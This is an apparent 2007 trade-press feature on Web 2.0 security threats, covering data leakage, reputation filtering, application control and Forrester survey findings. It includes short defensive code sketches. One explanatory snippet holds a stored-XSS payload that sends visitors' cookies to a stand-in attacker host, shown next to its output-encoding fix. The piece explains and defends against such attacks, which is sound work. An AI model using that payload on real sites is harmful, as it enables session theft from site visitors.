The trouble with the big new corporate security threat is that business is quickly becoming hooked on something it knows isn’t good for it. Like a dieter with a penchant for rich desserts, business is starting to realise all those sweets could be the cause of the problem – it just doesn’t have the self-control to completely cut out the chocolate.
Web 2.0 is popular and getting more so. As with many technology trends in the Internet age, consumers are leading the charge in the take-up of complex, interactive Web-based services and solutions that business is simply not prepared for. Yet business is getting increasingly hooked on collaborative, productivity-enhancing services delivered over the Internet – not only for its own use, but for its customers as well.
"Ours is an increasingly self-service culture," said David Dzienciol of Symantec. "People really want to take advantage of this. We are starting to find a self-service environment, and business applications are increasingly being provided on a self-service basis. That is part of what we see as the problem, as it leads to the threat of data leakage. How do we prevent that leakage?" he asks.
For reasons we'll look at more closely below, data leakage is perhaps the most threatening of the myriad Web 2.0 threats brought on by what security companies describe as a blurring of the network edge. The perimeter boundary that once formed the first line of defence against Web 1.0 threats has been broken down from the inside, as users eagerly gobble up the delights of a Web 2.0 world that tempts them with rich media, interactive features and user-generated content mashed up with sensitive enterprise data.
“We have seen a change in the Internet and the environment,” says Dzienciol, “particularly in the ways people are connecting and their usage patterns online – both as a consumer and in the enterprise.” Web 2.0, he says, “crosses the boundary.”
The attraction of Web 2.0, and at the same time the problem with it, is that it has significantly changed the type of traffic crossing the Web interface. Where websites once consisted mainly of brochureware, simple HTML pages containing text and images, today's website is an infinitely more interactive space where users access applications and exchange data. This change in emphasis has opened up new attack vectors and created both inbound and outbound security threats that have not been adequately addressed by the types of security that organisations employed in the Web 1.0 world.
This second generation of Web technologies encompasses a wide range of interactive activities that aim to promote collaboration and the sharing of data between Web users and between Web services. On the one hand, the adoption of Web 2.0 has fostered innovative new businesses and helped companies drive a new generation of productivity through collaboration and improved access to information. On the other, the very nature of Web 2.0 services tempts business to let down its defences a little and do things it never would have before, such as allowing applications written by an unknown source to run on its desktops, either in a browser or downloaded and installed locally. This sort of activity is becoming regular practice, yet it would have seemed unthinkable just a few short years ago.
Even where IT administrators have been alarmed by the potential threats, and are even reporting significant negative impacts from the new attack vectors introduced by the interactive Web, they have been largely unarmed: administratively and technically unprepared to deploy adequate countermeasures to protect corporate IT assets.
At least initially, it has been left to innovative security companies to move into the breach, devising new approaches to security that can adequately deal with the new threats. As these approaches have proved effective, larger security providers, who traditionally led the way with signature-scanning solutions, have begun to adopt the same strategies, techniques and technologies, augmenting their traditional approach with new tools that better deal with the blended threats encountered in today's computing environments.
What is becoming clearer, as the threat explosion continues to wreak havoc in the enterprise space, is that technology solutions alone will not suffice. Better policy and policy enforcement are now being brought to the forefront, and a higher level of end-user education and awareness is being advised as necessary compensation for the freedoms that Web 2.0 and broadband access bring users via their browsers.
Eric Krieger, Australian country manager at Secure Computing, said that while most enterprises understand the need to look at risk mitigation, they are struggling to balance control over the way users use the Web against the business imperative to let them use it. The desire of business to take advantage of Web 2.0 services is not properly matched by technology solutions able to protect it, he added. According to a Forrester Consulting report recently commissioned by Secure Computing, the enterprise needs not only to update its risk awareness and the tools it uses to protect itself, it must also review its policy framework and take a more structured and proactive approach to end-user education in order to help minimise the risk.
The Forrester study canvassed the opinions of 153 IT and security professionals from larger US organisations and found that while Web 2.0 use is already prevalent, the security measures in place to protect companies are inadequate and in many places demonstrably failing.
Forrester makes the point that the traditional boundary of external versus internal is quickly disappearing in the new Web world, leaving behind the policies, risk awareness and user training that organisations found adequate when dealing with Web 1.0.
The study found that many respondents were actively using Web 2.0 sites: 62 percent found Webmail and content-sharing platforms useful, and 49 percent rated rich interactive applications and real-time communication at the same level. However, they are clearly experiencing problems from threats such as viruses, Trojans and spyware, with 47 percent reporting that viruses caused significant problems and 42 percent citing Trojans. About a fifth (21 percent) admit their organisation has experienced "critical business disruption" from viruses, and 16 percent reported the same from Trojan activity.
Given their obvious pain, it is surprising to see a discrepancy between how prepared businesses perceive themselves to be and how prepared they actually are to deal with these threats, said Forrester. Nearly 97 percent consider themselves prepared for Web-borne threats, with only 68 percent conceding room for improvement. Those figures come despite 79 percent reporting 'more than infrequent' occurrences of malware, and more than 46 percent admitting they had spent over US$25,000 in the last fiscal year cleaning up after a malware infestation.
The report further found that approximately 75 percent are using URL filtering and signature scanning at the gateway, with only 37 percent deploying any form of heuristics-based detection. Still fewer (26 percent) are currently using behavioural analysis to detect zero-day attacks.
Traditional filtering mechanisms are proving ineffective, argued Forrester, with the respondents backing the assertion: 56 percent stated that such filtering does not catch all instances of malware, and 30 percent said currently employed filtering technologies do not protect users from phishing.
So while 75 percent of large enterprises have deployed URL filtering and signature scanning at the edge and found it ineffective, smaller companies are even further behind the curve, seriously exposing their operations to outside attack. The migration of so many business transactions onto the Web has significantly increased the financial rewards for cybercriminals, and consequently the sophistication and coordination of Web-borne attacks has risen accordingly to take advantage of this low-hanging fruit. Yet even larger organisations, which have the luxury of established security teams, have deployed what are now considered only Web 1.0 defences against the emerging malware plague.
Blended attacks employing techniques such as cross-site scripting (XSS) and even cross-site request forgery (CSRF) make traditional URL filtering inadequate, because even 'trusted' sites can quickly become a launching pad for attack, as some high-profile cases (Facebook and Monster.com) demonstrated in the past year.
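Why a 'trusted' site can turn hostile is easiest to see with a toy stored-XSS example. The sketch below is purely illustrative (the field names and payload are invented); it uses Python's standard `html.escape` for output encoding, the basic defence URL filtering cannot provide:

```python
import html

def render_comment_unsafe(comment: str) -> str:
    # A 'trusted' site that echoes user-generated content verbatim becomes a
    # launching pad: the injected script runs in every visitor's browser.
    return f"<div class='comment'>{comment}</div>"

def render_comment_safe(comment: str) -> str:
    # Output encoding neutralises the payload: the markup is displayed
    # as harmless text instead of being executed.
    return f"<div class='comment'>{html.escape(comment)}</div>"

payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
print(render_comment_unsafe(payload))  # payload survives intact
print(render_comment_safe(payload))    # payload rendered inert
```

Because the malicious content is served from a legitimate, pre-classified URL, a filter that trusts the domain waves it straight through – which is exactly the gap reputation and behavioural analysis aim to close.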
With the increasing prevalence of zero-day attacks, even signature scanning, long a staple of the security diet, is no longer an adequate means of protection on its own. The only hope of catching these attacks, suggests Forrester, is to employ "on-the-fly" dynamic detection capabilities such as behavioural and heuristics-based detection. Without them, many attacks will go undetected, the report warns.
Forrester goes further, suggesting that traditional filtering technologies must be updated to handle the new Web 2.0 reality: reputation services, content filtering, blended threat protection, heuristics and behaviour-based detection are all part of the new regime required to mitigate attack vectors that are quickly becoming commonplace.
This filtering of all channels is imperative because of the blended nature of today's threats. Increasingly, security administrators face situations where one threat spawns another to deliver malware payloads by exploiting weaknesses in multiple channels: spam leading to adware, which in turn ultimately leads to a phishing attack.
"One of the things we have found essential is the need for real-time reputation-based Web and message filtering, which can intercept and evaluate Web traffic even before it hits the network gateway, coupled with real-time anti-malware protection from Internet-based sources," explains Krieger, whose company secures the majority of the Dow Jones Global top 50 companies.
In particular, Krieger reiterates Forrester's advice to deploy reputation-based Web filtering. The company's TrustedSource solution monitors Web activity and checks IP address reputation in real time against one of five company-maintained repositories, which in turn track IP address reputations by applying a 180-point Bayesian and heuristic analysis to determine the reputation of each particular address.
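TrustedSource's internals are proprietary, but the general shape of a Bayesian reputation score can be sketched in a few lines. Everything below is an assumption for illustration – the feature names, likelihoods and prior are invented, and a real engine would combine far more signals:

```python
import math

# Hypothetical per-feature likelihoods: P(feature | malicious), P(feature | benign).
FEATURE_LIKELIHOODS = {
    "domain_age_under_30_days":  (0.60, 0.05),
    "hosts_executable_downloads": (0.40, 0.10),
    "listed_on_spam_blacklist":   (0.70, 0.02),
}

PRIOR_MALICIOUS = 0.10  # echoing the "one in 10 websites host malware" figure

def reputation_score(observed_features):
    """Posterior probability that a site is malicious, given observed features."""
    # Work in log-odds so independent evidence simply adds up.
    log_odds = math.log(PRIOR_MALICIOUS / (1 - PRIOR_MALICIOUS))
    for feature in observed_features:
        p_mal, p_ben = FEATURE_LIKELIHOODS[feature]
        log_odds += math.log(p_mal / p_ben)
    return 1 / (1 + math.exp(-log_odds))  # back to a probability

print(reputation_score([]))  # no evidence: just the prior (~0.10)
print(reputation_score(["domain_age_under_30_days", "listed_on_spam_blacklist"]))
```

The design point is that each observed trait shifts the log-odds independently, so a gateway can score a previously unseen address in real time instead of waiting for it to appear on a static blacklist.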
This level of monitoring is necessary to combat a situation where, research shows, on average one in 10 websites hosts some form of malware. Newly breached sites hosting malware emerge every day, often disappearing shortly afterwards to avoid detection and blacklisting. Without some form of near-real-time website reputation, pre-classified URL lists simply cannot keep up with this fast-changing threat landscape, says Forrester.
In another survey, carried out by enterprise security specialist Sophos, 80 percent of respondents confirmed they would like to block VoIP, IM, P2P traffic, games and distributed applications, with nearly 80 percent saying it was "essential" to block P2P traffic and more than 60 percent saying the same of VoIP. These security administrators are hampered by a cultural and business imperative to give more freedom to end users, who need to install and activate a wide variety of applications. Individually locking down users' PCs has been shown to result in considerable cost to IT departments, which must repeatedly intervene to help users access authorised applications, argues Sophos.
Zoe Nicholson, channel manager for Sophos in Australia, said the downside of giving users administration rights is that increasingly Web-savvy users download and install applications such as IM, P2P and VoIP services to help them communicate.
Instant messaging and peer-to-peer file-sharing applications in particular have frequently been shown to cause malware infections, consume scarce and costly network resources, and act as time-wasters that impact negatively on employee productivity. Similarly, 55 percent of Forrester's respondents say that between 30 percent and more than 50 percent of their organisational bandwidth goes to rich media and social networking sites (e.g. YouTube, MySpace, Facebook); 14 percent say these sites consume more than half of their available Web bandwidth.
Nicholson says the installation of unauthorised applications can pose significant legal and security risks. About half of workplace users download free Instant Messaging tools from the Internet, yet some 26 percent of employers aren’t even aware of their actions, she noted.
Toolbars and other desktop utilities can include user-generated widgets and applications to provide functionality. Often provided ‘as is’ with no warranty as to their safety, they can introduce significant security threats to the corporation.
“Organisations have to decide for themselves how strict they want to be in blocking potentially harmful Web-based services,” said Nicholson, but security companies need to provide easier ways to establish and implement policies that can block the download and installation of these applications.
Sophos' approach is to build application control right into the endpoint anti-virus security system, where it can be easily managed and administered. By doing the hard work of maintaining a list of blockable applications along with their signature files, Sophos enables policy-based granularity that can quickly and cost-effectively block one user group and not another, or allow access at different times of the day.
To get administrators started it also provides a free Application Discovery Tool to scan a network for applications it can control.
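The granularity described above – block one group but not another, or allow access only at certain hours – boils down to a rules lookup. The sketch below is a minimal illustration of that idea, not Sophos's actual policy schema; the group names, application classes and time windows are all invented:

```python
from datetime import time

# Hypothetical policy: which groups may run which application classes, and when.
# No entry means the application class is blocked for that group (default-deny).
POLICY = {
    ("engineering", "im"): (time(0, 0), time(23, 59)),  # IM allowed all day
    ("sales", "im"):       (time(12, 0), time(14, 0)),  # IM only over lunch
}

def is_allowed(group: str, app_class: str, now: time) -> bool:
    window = POLICY.get((group, app_class))
    if window is None:
        return False  # unlisted combinations are blocked outright
    start, end = window
    return start <= now <= end

print(is_allowed("engineering", "im", time(9, 30)))  # True
print(is_allowed("sales", "p2p", time(13, 0)))       # False: P2P not in policy
```

Pushing the check to the endpoint agent, as Sophos does, means the same rules apply whether the user is on the corporate LAN or working from home.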
Going in the other direction, you might be surprised to learn that while Forrester's research found 33 percent of respondents had already "reported significant problems as a result of data leaks", and that in 18 percent of cases these leaks resulted in "critical business disruptions", only 33 percent of respondents reported using any form of outbound content protection for their Web channel. Outbound scanning is designed to prevent the loss of intellectual property and to protect sensitive data types, such as data covered by privacy legislation. In fact, 58 percent of survey respondents expressed "extreme concern" about data leakage, rating the problem as highly as viruses (57 percent) and Trojans (51 percent).
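At its simplest, outbound content protection pattern-matches traffic for sensitive data types before it leaves the gateway. The sketch below is an assumption-laden illustration – the two detectors are crude stand-ins for the fingerprinting and contextual analysis a real DLP product would apply:

```python
import re

# Simplified detectors for sensitive data types (illustrative only).
SENSITIVE_PATTERNS = {
    "credit_card": re.compile(r"\b(?:\d[ -]?){15}\d\b"),          # 16 digits
    "au_tax_file_number": re.compile(r"\b\d{3}[ -]?\d{3}[ -]?\d{3}\b"),
}

def scan_outbound(message: str):
    """Return the sensitive data types found in an outbound message."""
    return [name for name, pattern in SENSITIVE_PATTERNS.items()
            if pattern.search(message)]

print(scan_outbound("Quarterly numbers attached."))           # []
print(scan_outbound("Card 4111 1111 1111 1111, exp 09/09."))  # ['credit_card']
```

A gateway would then block, quarantine or log any message for which the scan returns a non-empty list – which is why the 33 percent deployment figure looks so low against the 58 percent who rate leakage an "extreme concern".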
Many jurisdictions, including Australia, have legislative requirements that force organisations to take proactive steps to prevent the leakage of private data, but the mismatch between business and legislative imperatives on one hand and existing security measures on the other points to a business opportunity for resellers able to provide security consulting and solutions.
Symantec's Dzienciol outlines the significant risks and costs to companies that suffer data breaches, whether intentional or unintentional, through the loss of mobile computing equipment or through Web-based intrusion. Nor are the costs necessarily direct: for companies that let data leak out, they are more likely to stem from having to notify customers, and from the potential loss of customer trust and public reputation, than from having to restore data, he explains.
“From our perspective, Symantec really believes that data loss prevention has to be driven from a policy point of view. It cannot be solved by technology on its own. Companies need to understand what assets they have and how they intend to protect them.”
"Essentially we have a number of solutions; it's not about one product that does everything," he said. Endpoint protection solutions and network access control can help an organisation, but it also needs tools that can help it establish and implement a policy framework and administrative regime around data leakage.
Symantec Information Foundations 2007 is a suite of solutions that not only provides things like endpoint and network access security, but building on what Symantec calls its Security 2.0 strategy, it seeks to guard against data loss. With unified protection for email, Web and instant messaging – allowing for archiving and auditing of all information entering and leaving the enterprise – the solution is designed to support a process that can track and validate data movements ensuring proper “chains of custody”.
The solution begins with proper identification, classification and control of sensitive corporate data held in databases, email, IM and file systems, with 'review', 'hold', 'release' and 'audit' of Web-based communications, and includes beta-level support for outbound filtering of Web communications.
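A review/hold/release/audit workflow of the kind described can be modelled as a small state machine in which every transition is logged, which is what produces the "chain of custody". The states, actions and transitions below are illustrative assumptions, not Symantec's actual product behaviour:

```python
# Illustrative chain-of-custody state machine for outbound communications.
# (state, action) -> next state; anything not listed is forbidden.
TRANSITIONS = {
    ("review", "approve"): "release",
    ("review", "flag"):    "hold",
    ("hold",   "approve"): "release",
    ("hold",   "reject"):  "audit",
}

def advance(state: str, action: str, log: list) -> str:
    new_state = TRANSITIONS.get((state, action))
    if new_state is None:
        raise ValueError(f"action {action!r} not permitted in state {state!r}")
    log.append((state, action, new_state))  # every step is recorded for audit
    return new_state

log = []
state = "review"
state = advance(state, "flag", log)     # reviewer flags sensitive content
state = advance(state, "approve", log)  # released after manual inspection
print(state)     # release
print(len(log))  # 2 recorded custody steps
```

Because illegal transitions raise an error rather than silently succeeding, the log is a complete, tamper-evident record of how each message moved through the process – exactly what a discovery request would demand.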
The "chain of custody" imperative is driven by recent legal changes in the US, which require enterprises to be able to produce information in the event of a lawsuit or investigation.
Speaking with security vendors, it is clear that currently deployed technology solutions are increasingly unable to manage the emerging malware threat inherent in the rise of Web 2.0. And while the vendors are loath to admit any shortcomings in their security offerings, they are increasingly turning to additional forms of defence and enthusiastically urging companies to take further non-technical steps to combat the threat.
Clearly, the ad hoc user training and security policy frameworks uncovered by researchers (48 percent of those Forrester surveyed indicated they undertook only ad hoc training, and 12 percent appear to do none) are inadequate for the new Web 2.0 world order. While Forrester recommends the adoption of more advanced forms of Web filtering, adding site reputation, real-time behavioural analysis and heuristic threat detection, it also strongly advises companies to revisit staff training and security policy enforcement.
Trend Micro's Biviano stresses the need for organisations to rethink policy. "Policy is always the first step, and it needs to be said that policy hasn't caught up with the latest Web threat," says Biviano, adding that smaller organisations have typically avoided this part of the process and may struggle if they don't know where to turn.
This fact alone represents a potential business opportunity for resellers and solution providers with even a base-level skill set in security. Alongside end-user training, resellers and consultants can assist their clients by proactively encouraging them to undertake awareness training, so that security-aware users are less likely to fall foul of social engineering and other common forms of attack.
Written by Adam Gosling
Taming the Web 2.0 beast
By Staff Writers on Oct 23, 2007 2:46PM